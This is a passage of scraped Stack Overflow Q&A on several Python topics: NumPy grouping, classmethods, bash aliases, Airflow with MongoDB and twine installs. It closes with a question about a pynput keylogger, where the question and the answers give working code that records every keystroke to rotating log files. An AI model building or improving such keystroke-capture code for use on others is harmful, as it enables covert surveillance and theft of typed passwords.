\"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}',\n '{\"name\": \"Kathryn2\", \"time_created\": 1665335716, \"gender\": \"male\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}',\n\n ]\n\n for record in records:\n json_data = json.loads(record)\n\n name = json_data['name']\n gender = json_data['gender']\n print(name, gender)\n # connect postgresql\n # insert into target table\n\n"
] | [
0
] | [] | [] | [
"json",
"postgresql",
"python",
"python_3.x",
"sql"
] | stackoverflow_0074603117_json_postgresql_python_python_3.x_sql.txt |
Q:
Numpy: Average of values corresponding to unique coordinate positions
So, I have been browsing stackoverflow for quite some time now, but I can't seem to find the solution for my problem
Consider this
import numpy as np
coo = np.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = np.array([1, 2, 4, 2, 1, 6, 1])
The coo array contains the (x, y) coordinate positions
x = (1, 2, 3, 3, 1, 5, 1)
y = (2, 3, 4, 4, 2, 6, 2)
and the values array some sort of data for this grid point.
Now I want to get the average of all values for each unique grid point.
For example the coordinate (1, 2) occurs at the positions (0, 4, 6), so for this point I want values[[0, 4, 6]].
How could I get this for all unique grid points?
A:
You can sort coo with np.lexsort to bring the duplicate ones in succession. Then run np.diff along the rows to get a mask of starts of unique XY's in the sorted version. Using that mask, you can create an ID array that would have the same ID for the duplicates. The ID array can then be used with np.bincount to get the summation of all values with the same ID and also their counts and thus the average values, as the final output. Here's an implementation to go along those lines -
# Use lexsort to bring duplicate coo XY's in succession
sortidx = np.lexsort(coo.T)
sorted_coo = coo[sortidx]
# Get mask of start of each unique coo XY
unqID_mask = np.append(True,np.any(np.diff(sorted_coo,axis=0),axis=1))
# Tag/ID each coo XY based on their uniqueness among others
ID = unqID_mask.cumsum()-1
# Get unique coo XY's
unq_coo = sorted_coo[unqID_mask]
# Finally use bincount to get the summation of all coo within same IDs
# and their counts and thus the average values
average_values = np.bincount(ID,values[sortidx])/np.bincount(ID)
Sample run -
In [65]: coo
Out[65]:
array([[1, 2],
[2, 3],
[3, 4],
[3, 4],
[1, 2],
[5, 6],
[1, 2]])
In [66]: values
Out[66]: array([1, 2, 4, 2, 1, 6, 1])
In [67]: unq_coo
Out[67]:
array([[1, 2],
[2, 3],
[3, 4],
[5, 6]])
In [68]: average_values
Out[68]: array([ 1., 2., 3., 6.])
A:
You can use where:
>>> values[np.where((coo == [1, 2]).all(1))].mean()
1.0
A:
It is very likely going to be faster to flatten your indices, i.e.:
flat_index = coo[:, 0] * (np.max(coo[:, 1]) + 1) + coo[:, 1]  # +1 so distinct (x, y) pairs cannot collide
then use np.unique on it:
unq, unq_idx, unq_inv, unq_cnt = np.unique(flat_index,
return_index=True,
return_inverse=True,
return_counts=True)
unique_coo = coo[unq_idx]
unique_mean = np.bincount(unq_inv, values) / unq_cnt
than the similar approach using lexsort.
But under the hood the method is virtually the same.
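For reference, newer NumPy (>= 1.13) lets you skip the flattening entirely, since np.unique accepts an axis argument; a minimal sketch on the same data:
```python
import numpy as np

coo = np.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = np.array([1, 2, 4, 2, 1, 6, 1])

unq_coo, unq_inv, unq_cnt = np.unique(coo, axis=0,
                                      return_inverse=True,
                                      return_counts=True)
average_values = np.bincount(unq_inv, weights=values) / unq_cnt
# unq_coo -> [[1 2] [2 3] [3 4] [5 6]], average_values -> [1. 2. 3. 6.]
```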
A:
This is a simple one-liner using the numpy_indexed package (disclaimer: I am its author):
import numpy_indexed as npi
unique, mean = npi.group_by(coo).mean(values)
Should be comparable to the currently accepted answer in performance, as it does similar things under the hood; but all in a well tested package with a nice interface.
A:
Another way to do it is using JAX unique and grad. This approach might be particularly fast because it allows you to run on an accelerator (CPU, GPU, or TPU).
import functools
import jax
import jax.numpy as jnp
@jax.grad
def _unique_sum(unique_values: jnp.ndarray, unique_inverses: jnp.ndarray, values: jnp.ndarray):
errors = unique_values[unique_inverses] - values
return -0.5*jnp.dot(errors, errors)
@functools.partial(jax.jit, static_argnames=['size'])
def unique_mean(indices, values, size):
unique_indices, unique_inverses, unique_counts = jnp.unique(indices, axis=0, return_inverse=True, return_counts=True, size=size)
unique_values = jnp.zeros(unique_indices.shape[0], dtype=float)
return unique_indices, _unique_sum(unique_values, unique_inverses, values) / unique_counts
coo = jnp.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = jnp.array([1, 2, 4, 2, 1, 6, 1])
unique_coo, unique_mean = unique_mean(coo, values, size=4)
print(unique_mean.block_until_ready())
The only weird thing is the size argument since JAX requires all array sizes to be fixed / known beforehand. If you make size too small it will throw out good results, too large it will return nan's.
| Numpy: Average of values corresponding to unique coordinate positions | So, I have been browsing stackoverflow for quite some time now, but I can't seem to find the solution for my problem
Consider this
import numpy as np
coo = np.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = np.array([1, 2, 4, 2, 1, 6, 1])
The coo array contains the (x, y) coordinate positions
x = (1, 2, 3, 3, 1, 5, 1)
y = (2, 3, 4, 4, 2, 6, 2)
and the values array some sort of data for this grid point.
Now I want to get the average of all values for each unique grid point.
For example the coordinate (1, 2) occurs at the positions (0, 4, 6), so for this point I want values[[0, 4, 6]].
How could I get this for all unique grid points?
| [
"You can sort coo with np.lexsort to bring the duplicate ones in succession. Then run np.diff along the rows to get a mask of starts of unique XY's in the sorted version. Using that mask, you can create an ID array that would have the same ID for the duplicates. The ID array can then be used with np.bincount to get the summation of all values with the same ID and also their counts and thus the average values, as the final output. Here's an implementation to go along those lines - \n# Use lexsort to bring duplicate coo XY's in succession\nsortidx = np.lexsort(coo.T)\nsorted_coo = coo[sortidx]\n\n# Get mask of start of each unique coo XY\nunqID_mask = np.append(True,np.any(np.diff(sorted_coo,axis=0),axis=1))\n\n# Tag/ID each coo XY based on their uniqueness among others\nID = unqID_mask.cumsum()-1\n\n# Get unique coo XY's\nunq_coo = sorted_coo[unqID_mask]\n\n# Finally use bincount to get the summation of all coo within same IDs \n# and their counts and thus the average values\naverage_values = np.bincount(ID,values[sortidx])/np.bincount(ID)\n\nSample run -\nIn [65]: coo\nOut[65]: \narray([[1, 2],\n [2, 3],\n [3, 4],\n [3, 4],\n [1, 2],\n [5, 6],\n [1, 2]])\n\nIn [66]: values\nOut[66]: array([1, 2, 4, 2, 1, 6, 1])\n\nIn [67]: unq_coo\nOut[67]: \narray([[1, 2],\n [2, 3],\n [3, 4],\n [5, 6]])\n\nIn [68]: average_values\nOut[68]: array([ 1., 2., 3., 6.])\n\n",
"You can use where:\n>>> values[np.where((coo == [1, 2]).all(1))].mean()\n1.0\n\n",
"It is very likely going to be faster to flatten your indices, i.e.:\nflat_index = coo[:, 0] * np.max(coo[:, 1]) + coo[:, 1]\n\nthen use np.unique on it:\nunq, unq_idx, unq_inv, unq_cnt = np.unique(flat_index,\n return_index=True,\n return_inverse=True,\n return_counts=True)\nunique_coo = coo[unq_idx]\nunique_mean = np.bincount(unq_inv, values) / unq_cnt\n\nthan the similar approach using lexsort.\nBut under the hood the method is virtually the same.\n",
"This is a simple one-liner using the numpy_indexed package (disclaimer: I am its author):\nimport numpy_indexed as npi\nunique, mean = npi.group_by(coo).mean(values)\n\nShould be comparable to the currently accepted answer in performance, as it does similar things under the hood; but all in a well tested package with a nice interface.\n",
"Another way to do it is using JAX unique and grad. This approach might be particularly fast because it allows you to run on an accelerator (CPU, GPU, or TPU).\nimport functools\nimport jax\nimport jax.numpy as jnp\n\n\[email protected]\ndef _unique_sum(unique_values: jnp.ndarray, unique_inverses: jnp.ndarray, values: jnp.ndarray):\n errors = unique_values[unique_inverses] - values\n return -0.5*jnp.dot(errors, errors)\n\n\[email protected](jax.jit, static_argnames=['size'])\ndef unique_mean(indices, values, size):\n unique_indices, unique_inverses, unique_counts = jnp.unique(indices, axis=0, return_inverse=True, return_counts=True, size=size)\n unique_values = jnp.zeros(unique_indices.shape[0], dtype=float)\n return unique_indices, _unique_sum(unique_values, unique_inverses, values) / unique_counts\n\n\ncoo = jnp.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])\nvalues = jnp.array([1, 2, 4, 2, 1, 6, 1])\nunique_coo, unique_mean = unique_mean(coo, values, size=4)\nprint(unique_mean.block_until_ready())\n\nThe only weird thing is the size argument since JAX requires all array sizes to be fixed / known beforehand. If you make size too small it will throw out good results, too large it will return nan's.\n"
] | [
7,
2,
1,
1,
0
] | [] | [] | [
"arrays",
"numpy",
"python"
] | stackoverflow_0031878240_arrays_numpy_python.txt |
Q:
Python: Class method that references today's date, unless class is __init__ with something else
I am probably overengineering this - but I was hoping some can help me understand why this isn't working. My goal was to build a class that primarily uses classmethods, except in the case where a user creates an instance of the class so that they can change the assumed internal date.
import datetime as dt
class Example():
"""
Primary usage is via classmethods, however if historical is needed then create
an instance of the class and pass reference date
"""
@staticmethod
def _get_time_to_mat():
return dt.date.today()
def __init__(self, ref_date):
self.ref_date = ref_date
#change the date the class method uses for **this instance**
def _override_get_time_to_mat():
return self.ref_date
# I was hoping that I could overwrite the function with a new function object
self._get_time_to_mat = _override_get_time_to_mat
@classmethod
def get_date(cls):
return cls._get_time_to_mat()
However, when I run it
example_instance = Example(dt.date(2021,6,1))
print(Example.get_date())
print(example_instance.get_date())
2022-08-28
2022-08-28 # I would expect this to be 2021-06-01 !
Any help is appreciated! Thanks
PS.
I'd like to avoid having to pass a ref_date to the classmethod as an optional argument.
I'd also like to avoid just using an instance of the class where the ref_date is passed with a default of dt.date.today().
A:
Here's how I would implement the behaviour that you want.
class Example():
ref_date = dt.date.today()
def __init__(self, ref_date=None):
if ref_date:
self.ref_date = ref_date
>>> Example.ref_date
datetime.date(2022, 11, 28)
>>> example_instance = Example(dt.date(2021,6,1))
>>> example_instance.ref_date
datetime.date(2021, 6, 1)
Have a class attribute with the default value of the reference date, which gets overwritten if the user instantiates an object with another value. Then get rid of the getter method (it's fine in Python, it's got properties).
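As to why the original approach didn't work: get_date is a classmethod, so cls._get_time_to_mat is looked up on the class, while the _override_get_time_to_mat assigned to self in __init__ only lives on that one instance and is never seen through cls. A minimal illustration (names are made up for the demo):
```python
class Demo:
    @staticmethod
    def f():
        return "class version"

    def __init__(self):
        self.f = lambda: "instance version"  # only shadows f on this instance

    @classmethod
    def call(cls):
        return cls.f()  # always resolves on the class, never the instance

d = Demo()
print(d.call())  # 'class version', not 'instance version'
```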
A:
I will suggest that to implement this you use class attributes instead of overriding a class method in the initializer.
The following code should work
class Example():
"""
Primary usage is via classmethods, however if historical is needed then create
an instance of the class and pass reference date
"""
ref_date = dt.date.today()
def __init__(self, ref_date=None):
self.ref_date = ref_date
if ref_date:
self._override_class_date(ref_date)
#change the date the class method uses for **this instance**
@classmethod
def _override_class_date(cls, date):
cls.ref_date = date
@classmethod
def get_date(cls):
return cls.ref_date
In the code above, ref_date is a class attribute; when you create an instance with a new date, the class attribute itself is overridden. Note that if you only assign self.ref_date in __init__, you merely set an instance value that shadows the class attribute.
| Python: Class method that references today's date, unless class is __init__ with something else | I am probably overengineering this - but I was hoping some can help me understand why this isn't working. My goal was to build a class that primarily uses classmethods, except in the case where a user creates an instance of the class so that they can change the assumed internal date.
import datetime as dt
class Example():
"""
Primary usage is via classmethods, however if historical is needed then create
an instance of the class and pass reference date
"""
@staticmethod
def _get_time_to_mat():
return dt.date.today()
def __init__(self, ref_date):
self.ref_date = ref_date
#change the date the class method uses for **this instance**
def _override_get_time_to_mat():
return self.ref_date
# I was hoping that I could overwrite the function with a new function object
self._get_time_to_mat = _override_get_time_to_mat
@classmethod
def get_date(cls):
return cls._get_time_to_mat()
However, when I run it
example_instance = Example(dt.date(2021,6,1))
print(Example.get_date())
print(example_instance.get_date())
2022-08-28
2022-08-28 # I would expect this to be 2021-06-01 !
Any help is appreciated! Thanks
PS.
I'd like to avoid having to pass a ref_date to the classmethod as an optional argument.
I'd also like to avoid just using an instance of the class where the ref_date is passed with a default of dt.date.today().
| [
"Here's how I would implement the behaviour that you want.\nclass Example():\n ref_date = dt.date.today()\n \n def __init__(self, ref_date=None):\n if ref_date:\n self.ref_date = ref_date\n\n>>> Example.ref_date\ndatetime.date(2022, 11, 28)\n>>> example_instance = Example(dt.date(2021,6,1))\n>>> example_instance.ref_date\ndatetime.date(2021, 6, 1)\n\nHave a class attribute with the default value of the reference date, which gets overwritten if the user instantiates an object with another value. Then get rid of the getter method (it's fine in Python, it's got properties).\n",
"I will suggest that to implement this you use class attributes instead of overriding a class method in the initializer.\nThe following code should work\nclass Example():\n \"\"\" \n Primary usage is via classmethods, however if historical is needed then create \n an instance of the class and pass reference date \n \n \"\"\"\n ref_date = dt.date.today() \n \n def __init__(self, ref_date=None):\n self.ref_date = ref_date\n if ref_date:\n self._override_class_date(ref_date)\n \n #change the date the class method uses for **this instance** \n @classmethod\n def _override_class_date(cls, date): \n cls.ref_date = date\n \n @classmethod\n def get_date(cls):\n return cls.ref_date\n\nIn the following code the _date is a class atribute, in the case you create an instance, with a new date you override the class attribute with the instance attribute. Note if you assign self.ref_date to the new value in init you will only override the instance value that shadows the class attribute\n"
] | [
2,
1
] | [] | [] | [
"python"
] | stackoverflow_0074603379_python.txt |
Q:
Bash alias is not detected despite updating .bashrc with alias
I'm trying to set an alias for python to python3, and so far in .bashrc I have set the following:
.bashrc
alias python=python3
Following which, I ran: source ~/.bashrc. However, when I execute which python, it still points to /usr/bin/python, while which python3 returns /user/bin/python3.
I'm currently using bash shell, but I'm not sure why my python is not being aliased correctly to python3.
I've read in some places I need to set the alias in .bash_aliases or .bash_profile but this is my first time doing all of this so I'm a little lost. Appreciate any help!
A:
By definition, which only searches the executables on your PATH, so it knows nothing about shell aliases: which python will always show /usr/bin/python and which python3 will show /usr/bin/python3. So what your system is doing is correct; the alias itself is most likely working.
An alias definition provides a string value that replaces a command name when the command is read, but it exists only inside the shell. To check whether the alias took effect, use the shell builtin type python (which does report aliases) or simply run python --version.
| Bash alias is not detected despite updating .bashrc with alias | I'm trying to set an alias for python to python3, and so far in .bashrc I have set the following:
.bashrc
alias python=python3
Following which, I ran: source ~/.bashrc. However, when I execute which python, it still points to /usr/bin/python, while which python3 returns /user/bin/python3.
I'm currently using bash shell, but I'm not sure why my python is not being aliased correctly to python3.
I've read in some places I need to set the alias in .bash_aliases or .bash_profile but this is my first time doing all of this so I'm a little lost. Appreciate any help!
| [
"by definition, \"which\" will always show the full path of your shell commands, in your case, which python will show /usr/bin/python and for python3 /usr/bin/python3.SO what your system is doing is correct.\nAn alias definition provides a string value that replaces a command name when the command is read. The alias command does not allow you to use another known command as an alias, you are creating a conflict.\n"
] | [
0
] | [] | [] | [
"bash",
"python",
"python_3.x"
] | stackoverflow_0074601847_bash_python_python_3.x.txt |
Q:
Pipeline must be list Airflow
writing a DAG in airflow to extract sum of balance but getting error
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
from datetime import datetime
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow import AirflowException
# Connection
from airflow.providers.mongo.hooks.mongo import MongoHook
def wallet_bal():
hook = MongoHook(mongo_conn_id='mongo_default')
client = hook.get_conn()
print(f"** Connected to MongoDB **- {client.server_info()}")
db = client.test
query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])
wallets_collection = db.aggregate("wallets", query=query)
logger.info(wallets_collection)
logger.info("HI SEE THE PIPELINE")
return 'MONGO DATA TO CONNECT'
dag = DAG('WALLET_DAGS', description='Mongo Viewer', schedule_interval=None, start_date=datetime(2017, 3, 20), catchup=False)
connect_case_mongo = PythonOperator(task_id='test_wallet', python_callable=wallet_bal, dag=dag)
connect_case_mongo
getting same error again & again after so many diffrent changes
TypeError: pipeline must be a list
[2022-11-28, 11:24:51 UTC] {taskinstance.py:1401} INFO - Marking task as FAILED. dag_id=WALLET_DAGS, task_id=test_wallet, execution_date=20221128T112443, start_date=20221128T112449, end_date=20221128T112451
Tried different scenarios but not able to convert it in list i already have seen previous stack results
A:
my best guess of where your error lies is in either of the two 'aggregate' calls. That is, one/both of these lines has a bug:
query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])
wallets_collection = db.aggregate("wallets", query=query)
I googled your error and found some related questions that confirm this error has nothing to do with Airflow and it is a MongoDB error. There seems to be a bug with your 'aggregate' function call(s). Make sure to look at the MongoDB docs for the 'aggregate' method. It must take a 'pipeline' argument which is of type Sequence[Mapping[str, Any]]. Your first call seems to be correct as 'pipeline' argument is of type List which is type-casted to the required Sequence type I believe.
Your second aggregate call, however, has an issue: its first argument, which gets taken as the 'pipeline' argument, is a string (i.e. "wallets"). This is wrong, as the 'pipeline' parameter is of type Sequence[Mapping[str, Any]], NOT a string.
You might want to look at this related question: How to store aggregation pipeline in mongoDB?
In short, I'd advise ensuring that your aggregate arguments are of the correct type.
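In other words, the aggregation already runs in the first call; the second db.aggregate("wallets", query=query) call is both redundant and malformed. A minimal sketch of the fix inside wallet_bal (the pipeline must be a list of stage dicts):
```python
pipeline = [{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}]
result = list(db.wallets.aggregate(pipeline))  # aggregate returns a cursor; materialize it
logger.info(result)  # e.g. [{'_id': None, 'count': <sum of all balance.value>}]
```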
| Pipeline must be list Airflow | writing a DAG in airflow to extract sum of balance but getting error
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
from datetime import datetime
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow import AirflowException
# Connection
from airflow.providers.mongo.hooks.mongo import MongoHook
def wallet_bal():
hook = MongoHook(mongo_conn_id='mongo_default')
client = hook.get_conn()
print(f"** Connected to MongoDB **- {client.server_info()}")
db = client.test
query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])
wallets_collection = db.aggregate("wallets", query=query)
logger.info(wallets_collection)
logger.info("HI SEE THE PIPELINE")
return 'MONGO DATA TO CONNECT'
dag = DAG('WALLET_DAGS', description='Mongo
Viewer',schedule_interval=None,start_date=datetime(2017, 3, 20), catchup=False)
connect_case_mongo = PythonOperator(task_id='test_wallet', python_callable=wallet_bal, dag=dag)
connect_case_mongo
getting same error again & again after so many diffrent changes
TypeError: pipeline must be a list
[2022-11-28, 11:24:51 UTC] {taskinstance.py:1401} INFO - Marking task as FAILED. dag_id=WALLET_DAGS, task_id=test_wallet, execution_date=20221128T112443, start_date=20221128T112449, end_date=20221128T112451
Tried different scenarios but not able to convert it in list i already have seen previous stack results
| [
"my best guess of where your error lies is in either of the two 'aggregate' calls. That is, one/both of these lines has a bug:\n query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])\n \n wallets_collection = db.aggregate(\"wallets\", query=query)\n\nI googled your error and found some related questions that confirm this error has nothing to do with Airflow and it is a MongoDB error. There seems to be a bug with your 'aggregate' function call(s). Make sure to look at the MongoDB docs for the 'aggregate' method. It must take a 'pipeline' argument which is of type Sequence[Mapping[str, Any]]. Your first call seems to be correct as 'pipeline' argument is of type List which is type-casted to the required Sequence type I believe.\nYour second aggregate call, however, seems to have an issue. Your first argument which gets taken as the 'pipeline' argument is of type string (i.e. \"wallets\"). This is wrong as'pipeline' parameter is of type Sequence[Mapping[str, Any]] NOT of type string.\nYou might want to look at this related question: How to store aggregation pipeline in mongoDB?\nIn short, I'd advice to ensure that your aggregate arguments are of correct type.\n"
] | [
0
] | [] | [] | [
"airflow",
"list",
"mongodb",
"python"
] | stackoverflow_0074600095_airflow_list_mongodb_python.txt |
Q:
twine not found (-bash: twine: command not found)
I am trying to use twine to publish my first python package on pypi (of course will add on test-pypi first).
I followed the official guideline on https://packaging.python.org/tutorials/packaging-projects/.
But for some reason, twine is not found or not properly installed.
I installed twine using:
pip install twine
"pip list" says twine is installed on pip.
After I upgraded twine and everything, when I tried to run:
twine upload --repository-url https://test.pypi.org/legacy/ dist/*
then it says that twine is not found at all:
-bash: twine: command not found .
My system is mac (high sierra) and I am using python2.7 by conda. Pip is also configured to conda python:
>>pip -V
>>pip 10.0.1 from /anaconda2/lib/python2.7/site-packages/pip (python 2.7)
I would appreciate your help.
A:
Use python3 -m twine upload --repository-url https://test.pypi.org/legacy/ dist/*
A:
Based on @hoefling's comment, run
pip show -f twine
That will list the package metadata plus every file that belongs to the twine package (the -f flag adds the Files section, which includes the console script). It will output something like this:
Name: twine
Version: 1.12.1
Summary: Collection of utilities for publishing packages on PyPI
Home-page: https://twine.readthedocs.io/
Author: Donald Stufft and individual contributors
Author-email: [email protected]
License: Apache License, Version 2.0
Location: /Users/hakuna.matata/.local/lib/python3.6/site-packages
Requires: pkginfo, readme-renderer, tqdm, requests, requests-toolbelt, setuptools
Required-by:
Note the first file under Files which is ../../../bin/twine and Location: /Users/hakuna.matata/.local/lib/python3.6/site-packages. Of course your user name will replace 'hakuna.matata'
That will lead to a path to package executable at /Users/hakuna.matata/.local/bin which you can add it to your .bash_profile as
export PATH="/Users/hakuna.matata/.local/bin:$PATH"
Then, either restart terminal or
source ~/.bash_profile
A:
Run this command:
python -m twine upload dist/*
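If the missing PATH entry is the problem, you can also ask Python itself where console scripts get installed; a quick check, not twine-specific (for --user installs the relevant scheme differs, and pip show -f above gives the authoritative location):
```python
import sysconfig
print(sysconfig.get_path("scripts"))  # directory that should contain the 'twine' executable
```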
| twine not found (-bash: twine: command not found) | I am trying to use twine to publish my first python package on pypi (of course will add on test-pypi first).
I followed the official guideline on https://packaging.python.org/tutorials/packaging-projects/.
But for some reason, twine is not found or not properly installed.
I installed twine using:
pip install twine
"pip list" says twine is installed on pip.
After I upgraded twine and everything, when I tried to run:
twine upload --repository-url https://test.pypi.org/legacy/ dist/*
then it says that twine is not found at all:
-bash: twine: command not found .
My system is mac (high sierra) and I am using python2.7 by conda. Pip is also configured to conda python:
>>pip -V
>>pip 10.0.1 from /anaconda2/lib/python2.7/site-packages/pip (python 2.7)
I would appreciate your help.
| [
"Use python3 -m twine upload --repository-url https://test.pypi.org/legacy/ dist/*\n",
"Based on @hoefling comments run\npip show twine\n\nThat will list all files that belong to the twine package. It will output something like this:\n\nName: twine\nVersion: 1.12.1\nSummary: Collection of utilities for publishing packages on PyPI\nHome-page: https://twine.readthedocs.io/\nAuthor: Donald Stufft and individual contributors\nAuthor-email: [email protected]\nLicense: Apache License, Version 2.0\nLocation: /Users/hakuna.matata/.local/lib/python3.6/site-packages\nRequires: pkginfo, readme-renderer, tqdm, requests, requests-toolbelt, setuptools\nRequired-by: \n\n\nNote the first file under Files which is ../../../bin/twine and Location: /Users/hakuna.matata/.local/lib/python3.6/site-packages. Of course your user name will replace 'hakuna.matata'\nThat will lead to a path to package executable at /Users/hakuna.matata/.local/bin which you can add it to your .bash_profile as \nexport PATH=\"/Users/hakuna.matata/.local/bin:$PATH\"\nThen, either restart terminal or\nsource ~/.bash_profile\n\n",
"Run this command:\npython -m twine upload dist/*\n\n"
] | [
27,
2,
0
] | [] | [] | [
"pip",
"pypi",
"python",
"twine"
] | stackoverflow_0051451966_pip_pypi_python_twine.txt |
Q:
Filling data in one column if there are matching values in another column
I have a DF with parent/child items and I need to associate a time for the parent to all the children items. The time is only listed when the parent matches the child and I need that time to populate on all the children.
This is a simple example.
data = {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 0, 0, 0, 0, 39, 0, 0],
}
The expected results are:
results= {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 51, 51, 51, 39, 39, 39, 39],
}
Seems like it should be easy, but I can't wrap my head around where to start.
A:
If time is positive for the parent, or null, you can use a simple groupby.transform('max'):
df['Time'] = df.groupby('Parent')['Time'].transform('max')
Else, you can use:
df['Time'] = (df['Time']
.where(df['Parent'].eq(df['Child']))
.groupby(df['Parent']).transform('first')
.convert_dtypes()
)
Output:
Parent Child Time
0 a123 a123 51
1 a123 a1231 51
2 a123 a1232 51
3 a123 a1233 51
4 a234 a2341 39
5 a234 a234 39
6 a234 a2342 39
7 a234 a2343 39
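An equivalent approach, shown here as a sketch, builds a Parent-to-Time lookup from the rows where Parent equals Child and maps it back onto every row (this assumes each parent has exactly one such self-row, as in the example data):
```python
lookup = df.loc[df['Parent'].eq(df['Child'])].set_index('Parent')['Time']
df['Time'] = df['Parent'].map(lookup)
```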
| Filling data in one column if there are matching values in another column | I have a DF with parent/child items and I need to associate a time for the parent to all the children items. The time is only listed when the parent matches the child and I need that time to populate on all the children.
This is a simple example.
data = {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 0, 0, 0, 0, 39, 0, 0],
}
The expected results are:
results= {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 51, 51, 51, 39, 39, 39, 39],
}
Seems like it should be easy, but I can't wrap my head around where to start.
| [
"If time is positive for the parent, or null, you can use a simple groupby.transform('max'):\ndf['Time'] = df.groupby('Parent')['Time'].transform('max')\n\nElse, you can use:\ndf['Time'] = (df['Time']\n .where(df['Parent'].eq(df['Child']))\n .groupby(df['Parent']).transform('first')\n .convert_dtypes()\n)\n\nOutput:\n Parent Child Time\n0 a123 a123 51\n1 a123 a1231 51\n2 a123 a1232 51\n3 a123 a1233 51\n4 a234 a2341 39\n5 a234 a234 39\n6 a234 a2342 39\n7 a234 a2343 39\n\n"
] | [
-1
] | [] | [] | [
"dataframe",
"pandas",
"python"
] | stackoverflow_0074603334_dataframe_pandas_python.txt |
Q:
How to automatically save text file after specific time in python?
This is my keylogger code:
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time
start = time.time()
now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]
def on_press(key):
keys.append(key)
write_file(keys)
try:
print(key.char)
except AttributeError:
print(key)
def write_file(keys):
with open ('log-'+str(dt)+'.txt','w') as f:
for key in keys:
# end=time.time()
# tot_time=end-start
k=str(key).replace("'","")
f.write(k.replace("Key.space", ' ').replace("Key.enter", '\n'))
# if tot_time>5.0:
# f.close()
# else:
# continue
with Listener(on_press=on_press) as listener:
listener.join()
In the write_file() function, I've used the close method and also a timer that should automatically save the file every 5 seconds, but that gives me a page-long traceback whose last line says:
ValueError: I/O operation on closed file.
How do I make my program save the txt file after every 5 seconds and create a new txt file automatically?
NOTE: I actually want the log file to be generated automatically after every 4 hours so that it is not flooded with uncountable words. I've just taken 5 seconds as an example.
A:
The most important problem is that you did not reset the timer: after f.close(), end should be assigned back to start.
Also, since you call write_file() for every event, there is no reason to accumulate keys into keys[].
Also, you never empty keys[], so every write rewrites the entire history.
A:
I executed your program and found 2 problems.
The first one is about the start variable. Python use different namespaces for each program or function. Since start was defined at program level, it wasn't known in the function. Commenting out your timer logic was hiding the problem. You can fix the problem with the 'global' statement.
The second one is about "with open". If you use "with open" you must not close the file yourself. If you do, "with open" will not reopen the file.
Here's a working version of your program.
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time
start = time.time()
now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]
def on_press(key):
keys.append(key)
write_file(keys)
try:
print(key.char)
except AttributeError:
print(key)
def write_file(keys, f=None):
global start
for key in keys:
k=str(key).replace("'","").replace("Key.space", ' ').replace("Key.enter", '\n')
if not f:
f = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)
f.write( k)
end=time.time()
tot_time=end-start
if tot_time>5.0:
f.close()
f = None
start=end
else:
continue
keys = []
with Listener(on_press=on_press) as listener:
listener.join()
A nicer solution would be to move the open/close logic outside the write_file() function.
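One way to do that, sketched below (not from the original answers), is to rotate the file on a background threading.Timer so rotation is decoupled from keystrokes entirely; interval=5 matches the question's example, and 4*60*60 would give the 4-hour files:
```python
import threading
from datetime import datetime

class RotatingLog:
    """Minimal sketch: reopen the log file every `interval` seconds."""
    def __init__(self, interval=5):
        self.interval = interval
        self.lock = threading.Lock()   # keystrokes and rotation run on different threads
        self._open()
        self._schedule()

    def _open(self):
        stamp = datetime.now().strftime('%d%m%Y-%H%M%S')
        self.fh = open(f'log-{stamp}.txt', 'w')

    def _schedule(self):
        t = threading.Timer(self.interval, self._rotate)
        t.daemon = True                # don't keep the process alive just for the timer
        t.start()

    def _rotate(self):
        with self.lock:
            self.fh.close()
            self._open()               # start a fresh file
        self._schedule()               # re-arm the timer

    def write(self, text):
        with self.lock:
            self.fh.write(text)
            self.fh.flush()
```
on_press would then call log.write(k) instead of touching a file handle directly, and rotation happens on schedule regardless of typing activity.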
A:
You may have to customize the first line.
schedule = [ '08:00:00', '12:00:00', '16:00:00', '20:00:00'] # schedule for close/open file (must ascend)
import pynput
from pynput.keyboard import Listener
def on_press(key):
txt = key.char if hasattr( key, 'char') else ( '<'+key._name_+'>')
# do some conversions and concatenate to line
if txt == '<space>': txt = ' '
if txt == None: txt = '<?key?>' # some keyboards may generate unknown codes for Multimedia
glo.line += txt
